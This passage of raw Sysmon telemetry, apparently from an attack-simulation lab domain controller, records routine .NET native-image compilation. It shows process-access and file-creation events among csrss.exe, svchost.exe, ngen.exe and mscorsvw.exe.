tdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.656{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:15.656{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9163-6005-6A02-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.578{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9163-6005-6A02-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.578{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9163-6005-6A02-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+8
4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:15.515{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c08-0\System.Data.Services.Design.dll2021-01-18 13:47:15.515 10341000x80000000000000006619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:17.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.765{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:17.765{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9165-6005-6C02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.687{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9165-6005-6C02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.687{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9165-6005-6C02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:17.578{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c70-0\System.Data.SqlXml.dll2021-01-18 13:47:17.578 10341000x80000000000000006637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:18.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9166-6005-6E02-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:18.859{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9166-6005-6E02-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:18.859{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9166-6005-6E02-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:18.765{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1264-0\System.Deployment.dll2021-01-18 13:47:18.765 10341000x80000000000000006640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:19.203{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:19.187{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:19.187{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:24.984{59A5CD1D-9167-6005-6F02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1108-0\System.Design.dll2021-01-18 13:47:24.984 10341000x80000000000000006654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:25.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:25.562{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.484{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7202-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.484{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7202-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7202-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
